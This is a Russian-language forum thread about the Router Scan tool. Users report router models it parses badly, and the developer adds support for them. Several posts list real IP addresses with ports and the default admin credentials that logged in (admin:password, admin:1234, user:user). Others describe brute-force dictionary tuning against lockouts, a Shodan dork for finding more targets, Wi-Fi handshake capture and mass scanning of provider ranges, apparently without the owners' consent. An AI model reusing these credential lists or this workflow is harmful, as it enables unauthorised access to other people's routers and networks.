Глубже что то я не смог простучать. Ох уж эти американо, - мировые лидеры по количеству резервируемых адресов.

binarymaster
05.04.2017, 22:14
И вообще там всё интересно.

http://ip.posle.info/?ip=74.125.52.238

Глубже что то я не смог простучать. Ох уж эти американо, - мировые лидеры по количеству резервируемых адресов.


Так это ж гугл.

http://bgp.he.net/ip/74.125.52.238

Да, немного смущает отсутствие промежуточных узлов между 74.125.52.238 и 10.50.40.18, возможно на внутреннем режется TTL.

Kakoluk
05.04.2017, 22:18
Так это ж гугл.



Великий и Ужасный.

qwerty_332
06.04.2017, 21:08
Пожалуйста, обычный дешевенький 802.11n USB Wireless LAN card



У меня точно такой же адаптер, в Kali Linux отлично перехватывает хендшейки. Видосов как это делать на ютубе полным полно.

Хотя конечно для более серьезной работы лучше купить что-то вроде Alfa awus 036h

binarymaster
10.04.2017, 22:09
admin:[email protected]:80

ZTE ZXHN H118N, hardware: 2.3, firmware: 2.1.3_ROSCNT7

некорректно парсится

вот еще список таких же точек



Добавлено.

binarymaster
10.04.2017, 22:16
..\etc\db_default_eth_cfg.xml



Это path-traversal уязвимость, или просто для информации?

Felis-Sapiens
10.04.2017, 22:20
Это эксплойт, или просто для информации?



Это видимо не экплойт, но аккаунт этот надо добавить в список проверяемых: 5.l43.17.230

Kakoluk
10.04.2017, 22:27
Это path-traversal уязвимость, или просто для информации?



Да не, это просто путь в распакованной прошивке к файлу конфига. Для доказательства ликвидности связки логин/пароль(если вдруг возникнут вопросы).

Проверял связку на указанном диапазоне на 10-ти роутерах, пока не надоело.

- Вручную всё в логинится, RS НЕ не логинится и не парсит, + защита от брута(3 попытки).

binarymaster
10.04.2017, 22:32
Это видимо не экплойт, но аккаунт этот надо добавить в список проверяемых: 5.l43.17.230



Добавил.

evgeniykraus
12.04.2017, 14:00
Всем доброго времени суток. В теме новичок.

Подскажите кто в курсе, когда пытаюсь просканировать свой роутер, кроме информации о модели роутера и его внешнего ip не поступает, но когда я захожу на ip, который выдала программа, через браузер и ввожу стандартный пароль (user:user),все ок!

Вот название роутера- Eltex - NTP-RG-1402G-W:rev.C

Заметил,что с подобными моделями, разных рнвизий такая же проблема( Хотя,повторюсь, в ручном режиме доступ получить я мого.

Заранее спасибо

Kakoluk
12.04.2017, 14:04
Всем доброго времени суток. В теме новичок.

Подскажите кто в курсе, когда пытаюсь просканировать свой роутер, кроме информации о модели роутера и его внешнего ip не поступает, но когда я захожу на ip, который выдала программа, через браузер и ввожу стандартный пароль (user:user),все ок!

Вот название роутера- Eltex - NTP-RG-1402G-W:rev.C

Заметил,что с подобными моделями, разных рнвизий такая же проблема( Хотя,повторюсь, в ручном режиме доступ получить я мого.

Заранее спасибо



Заявка уже лежит: https://forum.antichat.ru/threads/398971/page-154#post-4067280

Ждём, когда у кодеров дойдут руки до этой модели.

evgeniykraus
12.04.2017, 14:09
Заявка уже лежит: https://forum.antichat.ru/threads/398971/page-154#post-4067280

Ждём, когда у кодеров дойдут руки до этой модели.


Тогда можно еще один спрошу.

Просканировав весь диапазон своего провайдера, я отсеял все ip по нужной мне модели роутера.

Внимание, вопрос! Ессть ли программа, которая достанет всю инфу из этих ip?

Sh ish
12.04.2017, 17:06
Alcatel-LucentI-240W-Q Кто нибудь сканил?

sha9
12.04.2017, 19:08
Ессть ли программа, которая достанет всю инфу из этих ip?



nmap к примеру

evgeniykraus
12.04.2017, 19:34
nmap к примеру


Спасибо)

pwr2
13.04.2017, 21:14
Не парсит новые версии прошивок роутеров Thomson.

27.145.128.42 8080 281 Done adminassword Thomson Router, firmware: STB6.66.05

27.145.128.188

27.145.129.156

27.145.129.170

27.145.128.57 8080 282 Done adminassword Thomson/Technicolor

27.145.128.111

27.145.128.155

27.145.128.196

27.145.128.231

27.145.129.37

27.145.129.75

27.145.129.119

27.145.129.165

27.145.129.250

27.145.129.251

binarymaster
13.04.2017, 23:03
Thomson Router, firmware: STB6.66.05






Thomson/Technicolor, firmware: SC05.00.20



Добавил.

pwr2
14.04.2017, 09:23
Добавил.



Спасибо. Ждем крайнюю сборку.

Еще вот такие версии прошивок выявились, не парсящиеся:

//

27.145.34.40 8080 688 Done adminassword Thomson/Technicolor, firmware: B5510mp2-S-EU-D213-160204

27.145.35.5 8080 781 Done admin:1234 Thomson/Technicolor, firmware: B5510mp2-S-EU-D213-160204

27.145.35.119 8080 328 Done adminassword Thomson/Technicolor, firmware: B5510mp2-S-EU-D213-160204

27.145.36.44 8080 750 Done adminassword Thomson/Technicolor, firmware: B5510mp2-S-EU-D213-160204

27.145.37.151 8080 297 Done adminassword Thomson/Technicolor, firmware: STCF.66.03

27.145.37.28 8080 328 Done adminassword Thomson/Technicolor, firmware: STCF.66.03

27.145.35.138 8080 312 Done :admin Thomson/Technicolor, firmware: STCF.66.03

27.145.35.89 8080 985 Done :admin Thomson/Technicolor, firmware: STCF.66.03

//

sha9
14.04.2017, 11:26
В теме новичок.

когда я захожу на ip, который выдала программа, через браузер и ввожу стандартный пароль (user:user),все ок!

Вот название роутера- Eltex - NTP-RG-1402G-W:rev.C

Заметил,что с подобными моделями, разных рнвизий такая же проблема( Хотя,повторюсь, в ручном режиме доступ получить я мого.



проблема может быть в том, что роутер лочится после н-го количества попыток подбора пароля. как правило 3 или 5. такие же проблемы наблюдаются к примеру, и у ряда хувеев при соответствующих настройках. т.е. проще говоря, программа не успевает подобрать пару логин-пароль, как роутер посылает в далекое эротическое (возможно гомосексуальное) путешествие. пока по словарю дойдет очередь до пары user-user, роутер закрывается. на данный момент - пока только ручками перепроверять интересующие айпишники.

Kakoluk
14.04.2017, 11:32
проблема может быть в том, что роутер лочится после н-го количества попыток подбора пароля. как правило 3 или 5. такие же проблемы наблюдаются к примеру, и у ряда хувеев при соответствующих настройках. т.е. проще говоря, программа не успевает подобрать пару логин-пароль, как роутер посылает в далекое эротическое (возможно гомосексуальное) путешествие. пока по словарю дойдет очередь до пары user-user, роутер закрывается. на данный момент - пока только ручками перепроверять интересующие айпишники.



Я заморачивался в словаре-авторизации RS(менял очерёдность связок), но это тоже гемор, на каждом диапазоне приходится так делать, в зависимости от контингента роутеров на нём. И да, не 100% результат.

binarymaster
14.04.2017, 12:28
Thomson/Technicolor, firmware: B5510mp2-S-EU-D213-160204






Thomson/Technicolor, firmware: STCF.66.03



Добавил.

sha9
14.04.2017, 13:02
Добавил.






Спасибо. Ждем крайнюю сборку.



судя по всему добавленному, нас ждет что-то очень даже интересное

binarymaster
14.04.2017, 13:57
судя по всему добавленному, нас ждет что-то очень даже интересное


Да чего уж там, всего-то добавил пару-тройку Томсонов, ибо в исходном коде по строчке на каждую модель. У них у всех почти одинаковая структура, поэтому писать новые парсеры редко приходится.

sha9
14.04.2017, 18:00
Да чего уж там, всего-то добавил пару-тройку Томсонов, ибо в исходном коде по строчке на каждую модель. У них у всех почти одинаковая структура, поэтому писать новые парсеры редко приходится.



ну почему-же? судя по постам и вашим добавлениям есть zte к примеру не так уж и мало вы добавили...

Kakoluk
16.04.2017, 13:02
Нельзя ли исправить мелкую ошибку при парсе D-Link DIR-865L и ему подобных?

Сам RS, вместо данных точки, пишет в базу такое:



D-Link DIR-865L, hardware: A1, firmware: 1.07


Скрин: https://yadi.sk/i/GI8o0QoA3H2csU

Она уже старая(всё забывал сказать) но несколько неприятная.

binarymaster
16.04.2017, 14:16
Нельзя ли исправить мелкую ошибку при парсе D-Link DIR-865L и ему подобных?



Поправил.

underpol
17.04.2017, 00:13
176.194.0.64

Wifire S1010

176.194.0.64 80 Done Unknown

binarymaster
17.04.2017, 11:35
176.194.0.64

Wifire S1010

176.194.0.64 80 Done Unknown



Если можно, давайте сразу dork на shodan.io, чтобы их было много. По одной штуке исследовать не комфортно, может пропасть в любой момент.

(посмотреть смогу лишь вечером)

Felis-Sapiens
17.04.2017, 12:17
давайте сразу dork на shodan.io



400 Bad Request mode=block nosniff org:"Net By Net Holding LLC"

Deps
17.04.2017, 16:11
Добрый день,решил просканировать свой регион и обновить данные для сайта,подскажите,где можно скачать последнею версию RS

binarymaster
17.04.2017, 16:23
подскажите,где можно скачать последнею версию RS



Ознакомьтесь с этим постом:

https://forum.antichat.ru/posts/4061320

Но учитывая, что поиск почему-то не находит последнюю версию:

https://forum.antichat.ru/posts/4064818

Deps
17.04.2017, 16:37
Благодарю.

Seraph
19.04.2017, 21:48
Скажите, можно ли реализовать возможность в программе, чтобы собирались данные логинов и паролей PPoE? Или хотя бы логинов. Спасибо.

binarymaster
19.04.2017, 21:58
Скажите, можно ли реализовать возможность в программе, чтобы собирались данные логинов и паролей PPoE? Или хотя бы логинов. Спасибо.



Нельзя, ознакомьтесь с пунктом 3.3 в разделе "Часто задаваемые вопросы" в официальной документации Router Scan.

binarymaster
22.04.2017, 13:38
Eltex - NTP-RG-1402G-W:rev.C



Вот этот добавлен.

binarymaster
22.04.2017, 15:09
TOTOLINK-N300RT-V2.1.6-B20160516.1249

парсится как Boa/0.94.14rc21 (Wireless Router)

доступ в админку по стандартному паролю а-а.



Добавил.

binarymaster
22.04.2017, 15:44
непонятный фокус с AirTies RT-205TT



Не удаётся повторить.

Shimura
23.04.2017, 11:12
В связи с тем, что некоторые устройства медленно думают/откликаются очень не хватает:

- кнопки для массового рескана timed out и недопарсившихся пассов/впс

- повторного сканирования диапазона исключая уже откликнувшиеся адреса с другими параметрами (тайм-аут, потоки, порты)

binarymaster
23.04.2017, 13:04
В связи с тем, что некоторые устройства медленно думают/откликаются очень не хватает:

- кнопки для массового рескана timed out и недопарсившихся пассов/впс

- повторного сканирования диапазона исключая уже откликнувшиеся адреса с другими параметрами (тайм-аут, потоки, порты)



Я обычно так делаю:

1. После сканирования выделяю в Good Results первые два столбца с IP и портами

2. Копирую их и вставляю в исключения (IP Exclusions)

3. Запускаю новое сканирование

conar
23.04.2017, 15:36
Всем доброго времени суток. Восстановить регу примерно больше чем 10летней давности не получилось, пришлось по новой регаться.

Когда-то в самом начале 2000х когда не у всех еще были даже ADSL модемы не говоря уже об ADSL2+. а о кабельном интернете обычные пользователи даже не слышали взламывал админки модемов и вот решил тряхнуть стариной.

Прога понравилась, но несколько пока мелких замечаний.

1. После очистки диапазона IP и внесения нового автоматически новый диапазон не цепляет. Чтобы началось сканирование нового диапазона нужно перезапустить. Порты меняются без перезапуска. (Мелочь)

2. Выдает очень много дублей. Один и тот-же IP порт и имя точки 2-3-4 раза. Выгрузил в exel Good, удалил дубли, загрузил назад. Например в таблице Good было 639 после удаления дублей осталось 271. (Есть возможность исключить дублирование?)

3. При включении сохранения создает много файлов с разницей что последующий содержит предыдущий, но предыдущий не удаляется. Сохраняет даже если стоит пауза сканирования. (Возможно при сохранении удалять предыдущий сохраненный файл ?) (Если сканируется сутки то каждые 5 мин новый файл потом такая куча. Хотя в принципе мелочь. Можно в ручную удалить)

4. При загрузке сохраненных результатов и запуске сканирования начинает сканировать с начала, а не с места остановки. А вот это уже не мелочь. Допустим я решил просканировать все диапазоны всех провайдеров города. Прога написала что нужно примерно 5 дней. И оставлять 5 дней комп включенным? Или если вдруг завис или вылет допустим тогда все предыдущее сканирование впустую? Можно сделать так что-бы сканирование при загрузке сохранения начиналось с IP следующего за последним сохраненным? (Наверное можно реализовать создание отдельного файла в который бы при сохранении записывался последний сканированный IP)

P.S Извиняюсь за многа букф

binarymaster
23.04.2017, 17:15
1. После очистки диапазона IP и внесения нового автоматически новый диапазон не цепляет. Чтобы началось сканирование нового диапазона нужно перезапустить. Порты меняются без перезапуска. (Мелочь)



Не очень понял, под перезапуском имеется ввиду перезапуск сканирования или программы целиком?



2. Выдает очень много дублей. Один и тот-же IP порт и имя точки 2-3-4 раза. Выгрузил в exel Good, удалил дубли, загрузил назад. Например в таблице Good было 639 после удаления дублей осталось 271. (Есть возможность исключить дублирование?)



Чтобы не было дублей, диапазоны не должны пересекаться.

Или речь идёт о дублировании одной веб морды на нескольких портах - тут ничего не сделаешь.



3. При включении сохранения создает много файлов с разницей что последующий содержит предыдущий, но предыдущий не удаляется. Сохраняет даже если стоит пауза сканирования. (Возможно при сохранении удалять предыдущий сохраненный файл ?) (Если сканируется сутки то каждые 5 мин новый файл потом такая куча. Хотя в принципе мелочь. Можно в ручную удалить)



Это фича. Сканер не всегда стабильно работает, особенно после большого количества найденных данных, поэтому лучше сохранять всё что есть.



4. При загрузке сохраненных результатов и запуске сканирования начинает сканировать с начала, а не с места остановки.



Это пока технически сложно реализовать.

conar
23.04.2017, 18:38
1. Порты после перезапуска сканирования. А диапазон IP если старый очистить и в ручную внести новый сканируется только после полного перезапуска программы.

2. Диапазон вычислял на сайте https://suip.biz/ru/ да действительно диапазоны пересекаются. будем искать сервис чтобы из формата CIDR делал нормальный диапазон и потом дубли чистить.

3. Понятно.

4. Тогда можно сделать так что-бы при выходе из программы в файле renges.txt IP сохранялись в обычном формате, а не в формате CIDR?

Triton_Mgn
23.04.2017, 18:54
2. Диапазон вычислял на сайте https://suip.biz/ru/ да действительно диапазоны пересекаются. будем искать сервис чтобы из формата CIDR делал нормальный диапазон и потом дубли чистить.



Сервисы есть отдельной темой https://forum.antichat.ru/threads/427913/

conar
23.04.2017, 19:30
Сервисы есть отдельной темой https://forum.antichat.ru/threads/427913/



Да мне нужны не сервисы диапазонов. Сервис перевода формата CIDR в обычный список. Но уже нашел прогу весит всего 600к.

P.S Интересно а RouteScan переварит 1558 диапазонов?

CRACK211
23.04.2017, 20:03
Поделитесь с народом добавлю в шапку темы сервисов



Да мне нужны не сервисы диапазонов. Сервис перевода формата CIDR в обычный список. Но уже нашел прогу весит всего 600к.

P.S Интересно а RouteScan переварит 1558 диапазонов?

sha9
23.04.2017, 21:03
Когда-то в самом начале 2000х когда не у всех еще были даже ADSL модемы не говоря уже об ADSL2+. а о кабельном интернете обычные пользователи даже не слышали взламывал админки модемов и вот решил тряхнуть стариной.



хорошее было время....расшары,открытые порты.....



Да мне нужны не сервисы диапазонов. Сервис перевода формата CIDR в обычный список


да таких сервисов - калькуляторов тьма в онлайне. хотя бы этот http://wb0.ru/ipcalc.php

но в принципе если хороший сайт с диапазонами - то зачем калькулятор? там уже все переведено. например ipinfo.io

conar
23.04.2017, 21:09
Для хороших людей ничего не жалко. http://rgho.st/7hp9qGyDL

Кстати насчет моего вопроса 4. Нашел способ ручным способом решить проблему.

Например последний просканированный IP 176.213.252.162

Открываем в папке с программой файл range.txt (оригинальный файл с полным диапазоном можно сохранить на всякий случай)

Находим диапазон которому принадлежит последний просканированный IP.

Это будет 176.213.252.0/22

Переводим этот диапазон из CDIR в список IP. Получаем 176.213.252.1-176.213.255.254

Вместо 176.213.252.0/22 вставляем диапазон начинающийся со следующего за последним просканированным Ip. То есть вместо 176.213.252.0/22

у нас будет 176.213.252.163-176.213.255.254.

Удаляем все предыдущие диапазоны (последующие не трогаем). Сохраняем файл.

Запускаем программу и .......

Сканирование начинается с IP следующего за тем на котором мы остановили сканирование и сохранили результаты.

Ну а результаты нескольких сканирований уж сможете сами склеить и потом если надо загрузить обратно в программу для анализа.

Ну как-то так.....

Может кому пригодится......

P.S А может когда нибудь это будет функцией программы вроде Продолжить с места остановки. И еще бы выключить компьютер после завершения сканирования. Эх помечтаем )))))

conar
23.04.2017, 21:10
хорошее было время....расшары,открытые порты.....

да таких сервисов - калькуляторов тьма в онлайне. хотя бы этот http://wb0.ru/ipcalc.php

но в принципе если хороший сайт с диапазонами - то зачем калькулятор? там уже все переведено. например ipinfo.io



Да.... И 21 порт не нужен был. 139го хватало......

Triton_Mgn
23.04.2017, 21:14
Для хороших людей ничего не жалко. http://rgho.st/7hp9qGyDL

Кстати насчет моего вопроса 4. Нашел способ ручным способом решить проблему.

Например последний просканированный IP 176.213.252.162

Открываем в папке с программой файл range.txt (оригинальный файл с полным диапазоном можно сохранить на всякий случай)

Находим диапазон которому принадлежит последний просканированный IP.

Это будет 176.213.252.0/22

Переводим этот диапазон из CDIR в список IP. Получаем 176.213.252.1-176.213.255.254

Вместо 176.213.252.0/22 вставляем диапазон начинающийся со следующего за последним просканированным Ip. То есть вместо 176.213.252.0/22

у нас будет 176.213.252.163-176.213.255.254.

Удаляем все предыдущие диапазоны (последующие не трогаем). Сохраняем файл.

Запускаем программу и .......

Сканирование начинается с IP следующего за тем на котором мы остановили сканирование и сохранили результаты.

Ну а результаты нескольких сканирований уж сможете сами склеить и потом если надо загрузить обратно в программу для анализа.

Ну как-то так.....

Может кому пригодится......

P.S А может когда нибудь это будет функцией программы вроде Продолжить с места остановки. И еще бы выключить компьютер после завершения сканирования. Эх помечтаем )))))



Если продолжать с места последней остановки, например на следующий день или еще позже, ip поменяются, в большинстве случаев у провайдеров они динамические, есть конечно какие то конторы , которые доплачивают за постоянный ip/ Так что лучше сканировать небольшими порциями по времени. Например мой пров 1 раз в сутки меняет.

Triton_Mgn
23.04.2017, 21:19
кстати, по поводу роутерскана и остановки. в роутерскане есть кнопочка "стоп-форсе стоп", но нет кнопочки "пауза" и запуск после паузы. мне кажется было-бы не лишним добавить такую функцию. иногда она бывает необходима. если, конечно не трудно это в плане реализации



Пауза правее

sha9
23.04.2017, 21:20
Ребят вы чего велосипед изобретаете?

Глядя на таблицу, легко без всяких калькуляторов прикинуть CIDR2IP.

Школьная таблица умножения на обороте тетради.


дык тож считать нужно... а после пасхи как-то не очень айсно

sha9
23.04.2017, 21:23
Пауза правее



или я слепой, или одно из двух. по возможности тыкни носом пли.и.из

спецом сейчас запустил и в упор не вижу блин....